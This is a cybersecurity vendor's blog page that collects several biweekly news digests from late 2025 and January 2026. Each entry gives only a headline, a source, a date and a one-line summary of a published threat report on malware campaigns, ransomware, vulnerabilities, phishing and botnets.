Malware Patrol | Blog Category: Cybersecurity News

Security Signals (1/13/26-1/27/26)

Welcome to your biweekly digest of curated cybersecurity intelligence.

Every two weeks, we bring you expert insights and handpicked articles covering the latest threats, threat actor activity, vulnerabilities, incident trends, and defensive strategies. Whether you’re on the front lines or shaping your organization’s security posture, Security Signals delivers the information you need to stay informed and ready.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Late January 2026 Cyber Threat Reports spotlight real-world abuse of trusted platforms and exposed infrastructure – from LockBit 5.0 and KONNI to BRICKSTORM, Gootloader-style delivery tricks, and attacks leveraging tools like Visual Studio Code, PAN-OS GlobalProtect, and Google Gemini. Expect recurring themes of phishing/credential theft, malware staging, and operational tooling that turns everyday enterprise workflows into attack paths.

Planned failure: Gootloader’s malformed ZIP actually works perfectly

Source: Expel
(Published: 15 January 2026)
Gootloader malware is delivered to victims in a ZIP archive and the ZIP itself is designed to bypass detection. Read more.

Keylogger targets 200,000+ employees at major US bank

Source: Sansec
(Published: 15 January 2026)
Sansec discovered an active keylogger on the employee merchandise store of a top 3 US bank. Read more.

Inside LockBit 5.0: Analyzing the Ransomware Group’s Latest Affiliate Panel and Encryption Variants

Source: Flare
(Published: 16 January 2026)
The leaked materials provide unprecedented visibility into LockBit’s affiliate management system, showing the interface used by ransomware operators to coordinate attacks and manage victim negotiations. Read more.

Remcos RAT Being Distributed to Korean Users

Source: ASEC (AhnLab)
(Published: 16 January 2026)
AhnLab SEcurity intelligence Center (ASEC) has confirmed the distribution of the Remcos RAT targeting users in South Korea. Read more.

Mandiant releases rainbow table that cracks weak admin password in 12 hours

Source: Ars Technica
(Published: 16 January 2026)
Windows laggards still using the vulnerable hashing function: Your days are numbered. Read more.

Poland Under Intensified DDoS Siege: Weekly DDoS Threat Intelligence Analysis

Source: SOCRadar
(Published: 18 January 2026)
Between 12 and 18 January 2026, SOCRadar identified an intensive coordinated DDoS campaign conducted by the pro-Russian threat actor NoName057(16) and their DDoSia attack tool. Read more.

CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal

Source: Palo Alto Networks
(Published: 19 January 2026)
A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Read more.

NCSC issues warning over hacktivist groups disrupting UK organisations and online services

Source: UK National Cyber Security Centre (NCSC)
(Published: 19 January 2026)
New alert warns of state-aligned hacktivists targeting UK organisations, looking to cripple services and disable websites. Read more.

Hacker admits to leaking stolen Supreme Court data on Instagram

Source: BleepingComputer
(Published: 19 January 2026)
A Tennessee man has pleaded guilty to hacking the U.S. Supreme Court’s electronic filing system and breaching accounts at the AmeriCorps U.S. federal agency and the Department of Veterans Affairs. Read more.

Broker who sold malware to the FBI set for sentencing

Source: The Register
(Published: 19 January 2026)
Feras Khalil Ahmad Albashiti, 40, admitted to facilitating cyberattacks on at least 50 companies stateside. Read more.

Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina’s Judicial Sector to Deploy a Covert RAT

Source: Seqrite
(Published: 19 January 2026)
Seqrite Labs has identified and uncovered a globally active spear-phishing campaign targeting Argentina’s judicial sector. Read more.

Weaponizing Calendar Invites: A Semantic Attack on Google Gemini

Source: Miggo
(Published: 19 January 2026)
A standard calendar invite became an attack vector, exposing how prompt injection in Google Gemini bypassed privacy controls through language alone. Read more.

Kimwolf Botnet Lurking in Corporate, Govt. Networks

Source: Krebs on Security
(Published: 20 January 2026)
A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Read more.

BRICKSTORM Malware Report Highlights the Criticality of Network-Derived Telemetry

Source: Gigamon
(Published: 20 January 2026)
Although GTIG laments the lack of security telemetry in its analysis of the BRICKSTORM malware, network-derived telemetry from the analysis of network traffic is a rich source that can and should be leveraged by threat hunters and IR teams. Read more.

Inside a Multi-Stage Windows Malware Campaign

Source: Fortinet (FortiGuard Labs)
(Published: 20 January 2026)
FortiGuard Labs recently identified a multi-stage malware campaign primarily targeting users in Russia. Read more.

IntelBroker Unmasked – The Story of Hacker Kai Logan West

Source: Picus Security
(Published: 20 January 2026)
If you’ve been following cybersecurity news lately, you’ve almost certainly heard the name “IntelBroker.”. Read more.

Threat Actors Expand Abuse of Microsoft Visual Studio Code

Source: Jamf
(Published: 20 January 2026)
Jamf Threat Labs identifies additional abuse of Visual Studio Code. Read more.

Predator bots are exploiting APIs at scale. Here’s how defenders must respond.

Source: CyberScoop
(Published: 20 January 2026)
With malicious bots now accounting for roughly 37% of all web traffic, security teams are left feeling like they’re playing a giant game of bot whack-a-mole. Read more.

PyPI Package Impersonates SymPy to Deliver Cryptomining Malware

Source: Socket
(Published: 21 January 2026)
Socket’s Threat Research Team identified a malicious PyPI package, sympy-dev, that impersonates SymPy, a widely used symbolic mathematics library with roughly 85 million downloads per month. Read more.

Peruvian Peaks: The digital loan illusion

Source: Group-IB
(Published: 21 January 2026)
A deep dive into loan phishing scams in Peru and Latin America. Read more.

Detailed Analysis of LockBit 5.0

Source: S2W (Medium)
(Published: 21 January 2026)
The LockBit ransomware group was affiliated with the Maze ransomware cartel, but after Maze announced its retirement, it began operating independently under the name ABCD ransomware starting in September 2019. Read more.

Phishing kits adapt to the script of callers

Source: Okta
(Published: 22 January 2026)
The threat actor convinces the targeted user to navigate in their browser to the phishing site under the pretext of an IT support or security requirement. Read more.

KONNI Adopts AI to Generate PowerShell Backdoors

Source: Check Point Research
(Published: 22 January 2026)
The PowerShell backdoor strongly indicates AI-assisted development rather than traditional operator-authored malware. Read more.

Weaponized in China, Deployed in India: The SyncFuture Espionage Targeted Campaign

Source: eSentire
(Published: 22 January 2026)
eSentire’s Threat Response Unit tracks this activity as “SyncFuture Espionage campaign” based on the abuse of SyncFuture/Yangtu enterprise software and a sophisticated multi-stage infection chain targeting Indian entities. Read more.

Microsoft Gave FBI Keys To Unlock Encrypted Data, Exposing Major Privacy Flaw

Source: Forbes
(Published: 22 January 2026)
Microsoft confirmed it does provide BitLocker recovery keys if it receives a valid legal order. Read more.

ErrTraffic: Inside a GlitchFix Attack Panel

Source: Censys
(Published: 20 January 2026)
ErrTraffic is a Traffic Distribution System (TDS) designed specifically for ClickFix-like campaigns. Read more.

Microsoft shared BitLocker keys with FBI, raising privacy fears

Source: TechRepublic
(Published: 26 January 2026)
Microsoft confirmed it can hand over BitLocker recovery keys stored in the cloud under warrant, reviving debate over who controls encrypted data. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (12/30/25-01/13/26)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

These early January 2026 cyber threat reports showcase how attackers are actively abusing trusted software, exposed infrastructure, and popular platforms to reach victims at scale. This roundup highlights GoBruteforcer server attacks, UAT-7290 telecom targeting, fake WinRAR installers delivering malware, malicious Chrome extensions abusing AI tools, and ongoing MacSync stealer campaigns impacting macOS users.

APT36 : Multi-Stage LNK Malware Campaign Targeting Indian Government Entities

Source: CYFIRMA
(Published: 30 December 2025)
CYFIRMA has identified a targeted malware campaign attributed to APT36 (Transparent Tribe), a Pakistan aligned threat actor actively engaged in cyber espionage operations against Indian governmental, academic, and strategic entities. Read more.

From Victim to Vector: How Infostealers Turn Legitimate Businesses into Malware Hosts

Source: InfoStealers
(Published: 30 December 2025)
This entry in the Hudson Rock database means that a computer – likely belonging to a developer or admin at jrqsistemas.com – was infected by an Infostealer. Read more.

2 Security Experts Plead Guilty In BlackCat Ransomware Case

Source: The Cyber Express
(Published: 30 December 2025)
Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were indicted in the BlackCat ransomware case in October. Read more.

Knownsec Data Breach: A Trove of Espionage Tradecraft with an Insider Narrative

Source: Resecurity
(Published: 31 December 2025)
The Knownsec leak is a pivotal incident of 2025 because it exposed the inner workings of a major state-linked Chinese cybersecurity firm, revealed espionage tools and global targets, internal documentation, and evidence of ongoing cyber operations targeting other countries. Read more.

VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion

Source: Unit 42 (Palo Alto Networks)
(Published: 2 January 2026)
This article details our technical analysis of VVS stealer, also styled VVS $tealer, including its distributors’ use of obfuscation and detection evasion. Read more.

Resurgence of Scattered Lapsus$ hunters

Source: CYFIRMA
(Published: 3 January 2026)
Recent monitoring of underground forums and Telegram communities has identified the resurgence of the Scattered Lapsus$ collective. Read more.

D-Link DSL/DIR/DNS Command Injection via DNS Configuration Endpoint

Source: VulnCheck
(Published: 5 January 2026)
severity critical. Read more.

NordVPN Denies Breach After Hacker Leaks Data

Source: SecurityWeek
(Published: 6 January 2026)
The VPN company has conducted an investigation after a threat actor claimed to have hacked its systems. Read more.

Phishing actors exploit complex routing and misconfigurations to spoof domains

Source: Microsoft Security Blog
(Published: 6 January 2026)
Any third-party connectors – such as a spam filtering service, security solution, or archiving service – must be configured properly or spoof detections cannot be calculated correctly, allowing phishing emails such as the examples below to be delivered. Read more.

The Great VM Escape: ESXi Exploitation in the Wild

Source: Huntress
(Published: 7 January 2026)
In December 2025, Huntress observed an intrusion leading to the deployment of VMware ESXi exploits. Read more.

Malicious NPM Packages Deliver NodeCordRAT

Source: Zscaler ThreatLabz
(Published: 7 January 2026)
Zscaler ThreatLabz regularly monitors the `npm` database for suspicious packages. Read more.

Researchers rush to warn defenders of max-severity defect in n8n

Source: CyberScoop
(Published: 7 January 2026)
Roughly 100,000 servers running the automated workflow platform for AI and other enterprise tools are potentially exposed to exploitation. Read more.

Chrome Extensions Impersonate AI Tools to Steal ChatGPT & DeepSeek Chats

Source: SOCRadar
(Published: 7 January 2026)
A recently uncovered malware campaign involving Chrome extensions demonstrates how seemingly legitimate AI-focused add-ons can be abused to quietly collect sensitive user data at scale. Read more.

Inside GoBruteforcer: AI-Generated Server Defaults, Weak Passwords, and Crypto-Focused Campaigns

Source: Check Point Research
(Published: 7 January 2026)
GoBruteforcer is a botnet that turns compromised Linux servers into scanning and password brute-force nodes. Read more.

UAT-7290 targets high value telecommunications infrastructure in South Asia

Source: Cisco Talos
(Published: 8 January 2026)
Cisco Talos is disclosing a sophisticated threat actor we track as UAT-7290, who has been active since at least 2022. Read more.

Fake WinRAR downloads hide malware behind a real installer

Source: Malwarebytes
(Published: 8 January 2026)
A member of our web research team pointed me to a fake WinRAR installer that was linked from various Chinese websites. Read more.

Maduro Arrest Used as a Lure to Deliver Backdoor

Source: Darktrace
(Published: 9 January 2026)
Darktrace researchers observed threat actors exploiting reports of Venezuelan President Maduro’s arrest to deliver backdoor malware. Read more.

MacSync stealer is using a notarized app to bypass Mac defenses

Source: Moonlock
(Published: 9 January 2026)
MacSync, the new macOS stealer in town, is back with new tricks. Read more.

Boto-Cor-de-Rosa campaign reveals Astaroth WhatsApp-based worm activity in Brazil

Source: Acronis Threat Research Unit
(Published: 8 January 2026)
In a newly identified campaign, internally referred to as Boto Cor-de-Rosa, our researchers discovered that Astaroth now exploits WhatsApp Web as part of its propagation strategy. Read more.

Under Medusa’s Gaze: How Darktrace Uncovers RMM Abuse in Ransomware Campaigns

Source: Darktrace
(Published: 8 January 2026)
Medusa ransomware increasingly exploits remote monitoring and management (RMM) tools for persistence, lateral movement, and data exfiltration. Read more.

Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant

Source: CloudSEK
(Published: 8 January 2026)
CloudSEK’s TRIAD recently identified a spear-phishing campaign attributed to the Muddy Water APT group targeting multiple sectors across the Middle East, including diplomatic, maritime, financial, and telecom entities. Read more.

North Korean Kimsuky Actors Leverage Malicious QR Codes in Spearphishing Campaigns Targeting U.S. Entities

Source: FBI IC3 (FLASH)
(Published: 8 January 2026)
The Federal Bureau of Investigation (FBI) is releasing this FLASH to alert NGOs, think tanks, academia, and other foreign policy experts with a nexus to North Korea of evolving tactics employed by the North Korean state-sponsored cyber threat group Kimsuky and to provide mitigation recommendations. Read more.

Iran Implements Nationwide Military Jamming to Cripple Starlink and Enforce Digital Blackout

Source: Reclaim The Net
(Published: 12 January 2026)
Iran’s government has expanded its control over digital communication, deploying military jamming systems that have largely disabled Starlink satellite access. Read more.

Stealthy malware masking its activity, deploying infostealer

Source: Kaspersky
(Published: 12 January 2026)
Our experts have detected a new wave of malicious emails targeting Russian private-sector organizations. Read more.

Hunting Lazarus: Inside the Contagious Interview C2 Infrastructure

Source: Red Asgard
(Published: 12 January 2026)
We found North Korean malware in a client’s Upwork project. Read more.

Unmasking the DPRK Remote Worker Problem

Source: Silent Push
(Published: 12 January 2026)
For decades, the “insider threat” was synonymous with the disgruntled staffer or the negligent contractor. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (12/02/25-12/16/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

Mid December 2025 Cyber Threat Reports highlight how rapidly evolving threats are colliding with geopolitics, cloud infrastructure, and everyday consumer tech. This roundup spans everything from React2Shell mass exploitation to new Android banking malware, Mirai botnets at sea, and fresh ransomware tooling targeting ESXi and EDR.

Investigating an AiTM Phishing Campaign Targeting M365 and Okta

Source: Datadog Security Labs
(Published: 10 December 2025)
Datadog researchers detail an adversary-in-the-middle phishing campaign designed to bypass MFA protections for Microsoft 365 and Okta users. Read more.

Share ChatGPT Chat ClickFix: macOS AMOS Infostealer

Source: Kaspersky
(Published: 9 December 2025)
Kaspersky researchers describe a macOS infostealer campaign abusing fake ChatGPT sharing prompts to trick users into executing malicious commands. Read more.

Detecting Mythic C2 in Network Traffic

Source: Kaspersky Securelist
(Published: 11 December 2025)
This research outlines techniques for identifying Mythic command-and-control traffic using network-level indicators and behavioral patterns. Read more.

IT, Geopolitics, and Cyber Risk: How Global Tensions Shape the Attack Surface

Source: Rapid7
(Published: 11 December 2025)
Rapid7 examines how geopolitical instability influences cyber operations, threat actor targeting, and organizational risk exposure. Read more.

CyberVolk Returns: Flawed VolkLocker Brings New Features With Growing Pains

Source: SentinelOne
(Published: 10 December 2025)
SentinelOne analyzes the reemergence of CyberVolk ransomware, highlighting technical flaws alongside newly added capabilities. Read more.

Cato CTRL: Deep Dive Into New JSCeal Infostealer Campaign

Source: Cato Networks
(Published: 11 December 2025)
Cato Networks investigates a new JSCeal infostealer campaign leveraging obfuscated JavaScript to harvest credentials at scale. Read more.

What Happens to Stolen Data After Phishing Attacks?

Source: Kaspersky Securelist
(Published: 12 December 2025)
This article examines how stolen credentials and personal data are monetized, resold, and reused following phishing attacks. Read more.

The Infostealer to APT Pipeline: How Lazarus Hijacked a Yemen Disinformation Network

Source: Infostealers.com
(Published: 12 December 2025)
Researchers describe how the Lazarus Group leveraged infostealer infrastructure to compromise and repurpose a Yemen-based disinformation network. Read more.

Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite

Source: Unit 42 (Palo Alto Networks)
(Published: 11 December 2025)
Unit 42 researchers detail how Hamas-affiliated threat actor Ashen Lepus is using a new AshTag malware suite to target Middle Eastern diplomatic entities. Read more.

Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks

Source: BleepingComputer
(Published: 12 December 2025)
Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an extremely sophisticated attack targeting specific individuals. Read more.

Operation MoneyMount-ISO – Deploying Phantom Stealer via ISO-Mounted Executables

Source: Seqrite
(Published: 12 December 2025)
At Seqrite Labs, we continuously monitor global cyber threat activity. Read more.

Threats Behind the Mask of Gentlemen Ransomware

Source: ASEC
(Published: 11 December 2025)
ASEC researchers analyze threats hidden behind the so-called Gentlemen ransomware, including its infection vector, encryption behavior, and tactics for evading detection. Read more.

Evolution of Composite Cyber Threats: 2025 Analysis and 2026 Key Response Strategies

Source: Medium (@nshcthreatrecon)
(Published: 15 December 2025)
This long-form analysis explores how composite cyber threats evolved in 2025 and outlines key response strategies defenders should prioritize in 2026. Read more.

Free Micropatches for Windows Remote Access Connection Manager DoS

Source: 0patch
(Published: 11 December 2025)
0patch ships free micropatches for a Windows Remote Access Connection Manager zero day that attackers can abuse to gain Local System privileges on vulnerable hosts. Read more.

Microsoft Teams to Introduce External Domains Anomalies Report for Enhanced Security

Source: Cybersecurity News
(Published: 11 December 2025)
Microsoft is adding an External Domains Anomalies report to Teams so administrators can spot unusual communication patterns with outside tenants and clamp down on risky connections. Read more.

New DroidLock Malware Locks Android Devices and Demands a Ransom

Source: Cybersecurity News
(Published: 11 December 2025)
Researchers warn that the DroidLock Android malware is being pushed via phishing sites, locking victims’ phones for ransom while also enabling attackers to take remote control. Read more.

Notepad++ Vulnerability Let Attackers Hijack Network Traffic to Install Malware via Updates

Source: Cybersecurity News
(Published: 11 December 2025)
A vulnerability in Notepad++ update traffic could allow threat actors to intercept requests on the network and deliver malicious payloads disguised as legitimate software updates. Read more.

Threat actors exploit React2Shell CVE-2025-55182

Source: Google Cloud Threat Intelligence
(Published: 12 December 2025)
Google Threat Intelligence details how multiple actors quickly weaponized the React2Shell (CVE-2025-55182) remote code execution flaw in React Server Components to gain initial access to internet facing services. Read more.

How NoName05716 Uses DDoSia to Attack NATO Targets

Source: Picus Security
(Published: 14 December 2025)
Picus analyzes how pro Russian hacktivist group NoName05716 leverages its DDoSia platform to coordinate politically motivated DDoS attacks against NATO aligned governments and organizations. Read more.

Frogblight threatens you with a court case: a new Android banker targets Turkish users

Source: Securelist
(Published: 15 December 2025)
Kaspersky describes Frogblight, an Android banking trojan distributed via smishing and fake government court case portals that steals banking credentials and can remotely control infected devices. Read more.

DDoS Threat Intelligence: Belgium, 15 Dec 2025

Source: SOCRadar
(Published: 15 December 2025)
SOCRadar details a DDoSia campaign by pro Russian group NoName05716 that generated thousands of DDoS attacks focusing on Belgium as well as Ukraine and other European targets between 8 and 14 December 2025. Read more.

Cyberattack on the Sun

Source: Cato Networks
(Published: 15 December 2025)
Cato Networks examines how insecure legacy protocols in solar power infrastructure could let attackers manipulate inverters at scale and cause widespread power disruption. Read more.

TR SantaStealer Is Coming to Town: A New, Ambitious Infostealer Advertised on Underground Forums

Source: Rapid7
(Published: 15 December 2025)
Rapid7 profiles SantaStealer, a new information stealing malware as a service offering on underground forums that targets browser, cryptocurrency wallet, and application credentials. Read more.

Phishing Kits: An Interactive Deep Dive

Source: Flare
(Published: 15 December 2025)
Flare takes an interactive look at modern phishing kits, showing how they bundle cloned login pages, evasion features, and automation to let low skill actors harvest credentials at scale. Read more.

GhostPairing Attacks: from phone number to full access in WhatsApp

Source: Gen Digital
(Published: 15 December 2025)
Gen researchers describe GhostPairing, a WhatsApp account takeover technique where attackers trick victims into pairing an attacker controlled device without ever stealing their password. Read more.

16TB of MongoDB Database Exposes 4.3 Billion Lead Gen Records

Source: Hackread
(Published: 15 December 2025)
Hackread reports on an unsecured 16TB MongoDB instance left open online that exposed over 4.3 billion professional lead generation records containing extensive personal and business data. Read more.

BreachForums Reemerges, Admin Apologizes for Honeypot Confusion, Claims the Attack the French Govt Announced Impacting Over 16M Individuals

Source: TechNadu
(Published: 15 December 2025)
TechNadu covers BreachForums administrators resurfacing to deny being a law enforcement honeypot while claiming responsibility for a French government data breach affecting more than 16 million people. Read more.

Kimsuky Distributing Malicious Mobile App via QR Code

Source: Enki White Hat
(Published: 16 December 2025)
Enki’s White Hat team analyzes new DOCSWAP APK variants delivered via QR code phishing sites and attributes the campaign to DPRK aligned threat actor Kimsuky. Read more.

Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Source: Check Point Research
(Published: 16 December 2025)
Check Point Research exposes Chinese espionage actor Ink Dragon, showing how it turns compromised IIS servers into a ShadowPad based relay mesh spanning government and telecom victims worldwide. Read more.

CastleRAT malware detection with Splunk and MITRE ATT&CK

Source: Splunk
(Published: 5 December 2025)
Splunk Threat Research shows how defenders can detect CastleRAT infections by mapping the malware’s behaviors to MITRE ATT&CK techniques and translating them into Splunk detections. Read more.

Hypervisor defenses against ransomware targeting ESXi

Source: Huntress
(Published: 8 December 2025)
Hypervisors are the backbone of modern virtualized environments, but when ransomware targets ESXi hosts the blast radius can quickly extend across an entire organization. Read more.

White Lynx uses CAPTCHA macros

Source: Unit 42 (Palo Alto Networks)
(Published: 8 December 2025)
This Unit 42 timely threat intel note documents a White Lynx phishing campaign that uses a CAPTCHA themed Word macro to deliver malware and harvest victim credentials. Read more.

React2Shell exploitation escalates into mass attacks

Source: The Hacker News
(Published: 10 December 2025)
The Hacker News reports that a critical ReactPHP vulnerability dubbed React2Shell, tracked as CVE 2025 55182, is now being widely exploited to deploy web shells on vulnerable servers. Read more.

Windows PowerShell 0 day vulnerability allows attackers to execute malicious code

Source: Cybersecurity News
(Published: 10 December 2025)
Security researchers warn that a newly disclosed Windows PowerShell 0 day vulnerability could allow attackers to execute arbitrary code on Windows systems if it is abused by threat actors. Read more.

Fortinet FortiGate under active attack

Source: The Hacker News
(Published: 11 December 2025)
A critical flaw in Fortinet FortiOS and FortiProxy is being actively exploited, allowing attackers to bypass authentication on FortiGate devices and gain full control of vulnerable appliances. Read more.

NANOREMOTE, cousin of FINALDRAFT

Source: Elastic Security Labs
(Published: 11 December 2025)
In October 2025, Elastic Security Labs discovered a newly observed Windows backdoor in telemetry that they call NanoRemote, which closely resembles the FINALDRAFT implant. Read more.

Shanya emerges as top EDR killing tool for ransomware gangs

Source: Techworm
(Published: 11 December 2025)
Techworm profiles Shanya, a new EDR killing utility aggressively marketed to ransomware gangs for disabling security tools before encryption begins. Read more.

Intellexa leaks: Predator spyware operations exposed

Source: Amnesty International Security Lab
(Published: 11 December 2025)
Amnesty International’s Security Lab analyzes a large leak of Intellexa documents that exposes how the Predator spyware platform has been sold and deployed around the world. Read more.

Cracking ValleyRAT: from builder secrets to kernel rootkits

Source: Check Point Research
(Published: 12 December 2025)
Throughout 2025, Check Point Research tracked the evolution of ValleyRAT, following the malware from leaked builder tools to sophisticated kernel level rootkits used in the wild. Read more.

Technical analysis of the BlackForce phishing kit

Source: Zscaler
(Published: 12 December 2025)
Zscaler ThreatLabz provides a technical deep dive into the BlackForce phishing as a service kit, which automates Microsoft 365 credential theft using reverse proxy techniques and extensive anti analysis features. Read more.

China-Nexus Cyber Threat Groups Rapidly Exploit React2Shell Vulnerability (CVE-2025-55182)

Source: AWS Security Blog
(Published: 4 December 2025)
Within hours of the React2Shell CVE-2025-55182 disclosure, Amazon threat intelligence teams observed multiple China-nexus actors attempting to exploit vulnerable Next.js applications at scale. Read more.

Advent of Configuration Extraction – Part 2: Unwrapping QuasarRAT’s Configuration

Source: Sekoia.io
(Published: 8 December 2025)
This second installment of the Advent of Configuration Extraction series shows how analysts can unpack QuasarRAT samples and extract their encrypted configuration from the .NET binary. Read more.

BYOVD Loader Deploys DeadLock Ransomware

Source: Talos Intelligence
(Published: 9 December 2025)
Cisco Talos details a new bring-your-own-vulnerable-driver (BYOVD) loader used to disable security products and deploy DeadLock ransomware in targeted attacks. Read more.

Cydome Identifies Broadside, a New Mirai Botnet Variant Targeting Maritime IoT

Source: Cydome
(Published: 3 December 2025)
Cydome researchers uncover Broadside, a Mirai-based botnet variant that abuses weakly secured maritime IoT devices to build a DDoS-capable fleet. Read more.

Malicious VSCode Extension Launches Multi-Stage Attack Chain with Anivia Loader and OctoRAT

Source: Hunt.io
(Published: 3 December 2025)
Hunt.io describes a malicious Visual Studio Code extension that delivers a multi-stage attack chain, ultimately deploying the Anivia loader and OctoRAT for persistent remote control. Read more.

SMS Phishers Pivot to Points, Taxes, Fake Retailers

Source: Krebs on Security
(Published: 4 December 2025)
Brian Krebs reports that China-based SMS phishing crews now sell phishing kits for mass-creating fake e-commerce sites that funnel victims’ card data into mobile wallets, alongside lures about tax refunds and rewards points. Read more.

OSINT Kitten: The Headquarters for Hacktivist Operations Against Israel

Source: Medium
(Published: 5 December 2025)
This investigation profiles OSINT Kitten as a coordination hub for hacktivist campaigns targeting Israel, outlining how propaganda, leaks, and operational chatter intersect on the platform. Read more.

Inside Shanya: A Packer-as-a-Service Fueling Modern Attacks

Source: Sophos News
(Published: 6 December 2025)
Sophos examines Shanya, a packer-as-a-service offering that ransomware groups increasingly use to obfuscate payloads, evade analysis, and extend the lifespan of their campaigns. Read more.

Nothing to Steal? Let’s Wipe. We Are Analyzing the Shai Hulud 2.0 npm Worm

Source: Securelist (Kaspersky)
(Published: 9 December 2025)
Kaspersky researchers dissect Shai Hulud 2.0, a destructive npm worm that abuses developer tooling and supply chain trust to spread and wipe systems instead of stealing data. Read more.

Cato CTRL: Weaponizing Claude Skills with MedusaLocker

Source: Cato Networks
(Published: 10 December 2025)
Cato Networks describes how red-teamers simulated an attack in which MedusaLocker operators combine LLM-powered automation with C2 infrastructure to accelerate discovery, lateral movement, and impact. Read more.

New eBPF Filters for Symbiote and BPFdoor Malware

Source: Fortinet
(Published: 9 December 2025)
Fortinet introduces new eBPF-based detection filters that help defenders identify and hunt for stealthy Linux threats such as Symbiote and BPFdoor in production environments. Read more.

UDPGangster Campaigns Target Multiple Countries

Source: Fortinet
(Published: 4 December 2025)
FortiGuard Labs reveals UDPGangster, a UDP-based backdoor linked to MuddyWater that is being used in campaigns against organizations across several Middle Eastern and neighboring states. Read more.

Investigating Indonesia’s Gambling Ecosystem: Indicators of National-Level Cyber Operations

Source: Malanta
(Published: 3 December 2025)
Malanta’s research team maps Indonesia’s online gambling infrastructure and highlights technical and behavioral indicators that could signal involvement by state-linked operators. Read more.

Deceptive Layoff-Themed HR Email Distributes Remcos RAT Malware

Source: Seqrite
(Published: 9 December 2025)
Seqrite analyzes phishing emails masquerading as layoff notifications that deliver a weaponized attachment used to install the Remcos remote access trojan. Read more.

Operation DupeHike: UNG0902 Targets Russian Employees with DupeRunner and AdaptixC2

Source: Seqrite
(Published: 3 December 2025)
This report documents Operation DupeHike, where the UNG0902 group uses phishing lures and custom malware families DupeRunner and AdaptixC2 to target employees in Russia. Read more.

Africa in the Crosshairs: Covert Influence, Cyber Operations, and the New Geopolitics

Source: Silobreaker
(Published: 9 December 2025)
Silobreaker explores how non-Western powers use information operations, cyber activity, and local partnerships to shape narratives and political outcomes across Africa. Read more.

AI-Automated Threat Hunting Brings GhostPenguin Out of the Shadows

Source: Trend Micro
(Published: 8 December 2025)
Trend Micro introduces GhostPenguin, a previously undocumented Linux backdoor discovered through AI-assisted threat hunting and low-detection telemetry analysis. Read more.

Dangerous Invitations: Russian Threat Actor Spoofs European Security Events in Targeted Phishing Attacks

Source: Volexity
(Published: 4 December 2025)
Volexity details a campaign in which a Russian threat actor sends spoofed invitations to high-profile European security conferences to deliver malware to selected targets. Read more.

Attackers Actively Exploiting Critical Vulnerability in King Addons for Elementor Plugin

Source: Wordfence
(Published: 2 December 2025)
Wordfence warns that a critical privilege escalation flaw in the King Addons for Elementor plugin is under active exploitation, enabling unauthenticated attackers to gain admin access. Read more.

Technical Analysis of Matanbuchus 3.0

Source: Zscaler
(Published: 2 December 2025)
Zscaler ThreatLabz provides a deep technical dive into Matanbuchus 3.0, a C++ downloader malware-as-a-service that now plays a growing role in ransomware operations. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (11/18/25-12/02/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

November to December 2025 Cyber Threat Reports brings together a fast-moving mix of supply chain compromises, ransomware evolutions, APT operations, and cloud-targeted attacks. This roundup highlights how actors are abusing npm ecosystems, targeting SSO and identity platforms, and weaponizing IoT and banking malware, giving your team timely context to tune detections and prioritize defenses.

Autumn Dragon: China-nexus APT Group Targets South East Asia

Source: CyberArmor
(Published: 18 November 2025)
Since early 2025, China’s involvement in the Indo-Pacific has been more prolific, from escalating maritime tensions, to being peacebroker in Myanmar’s military junta and more recently, espionage activities on joint exercises the Philippines naval forces have been conducting together with the US, Australia, Canada and New Zealand. Read more.

Cloudflare outage on November 18, 2025

Source: Cloudflare
(Published: 18 November 2025)
On November 18, 2025, Cloudflare experienced an outage that affected a portion of traffic on its network. Read more.

Fortinet warns of new FortiWeb zero-day exploited in attacks

Source: BleepingComputer
(Published: 18 November 2025)
Today, Fortinet released security updates to patch a new FortiWeb zero-day vulnerability that threat actors are actively exploiting in attacks. Read more.

Breaking Down S3 Ransomware: Variants, Attack Paths and Trend Vision One™ Defenses

Source: Trend Research
(Published: 18 November 2025)
Ransomware is shifting from traditional systems to cloud environments, redefining its impact on cloud-native data. Read more.

Masked in Memory: A Hidden .PYC Fragment Utilises cvtres.exe to Communicate With C&C

Source: K7 Labs
(Published: 19 November 2025)
During a routine analysis at K7 Labs, we encountered a Python-based malware sample that uses multi-stage obfuscation. Read more.

The Cloudflare Outage May Be a Security Roadmap

Source: Krebs on Security
(Published: 19 November 2025)
An intermittent outage at Cloudflare on Tuesday briefly knocked many of the Internet’s top destinations offline. Read more.

Cooking up trouble: How TamperedChef uses signed apps to deliver stealthy payloads

Source: Acronis Threat Research Unit
(Published: 19 November 2025)
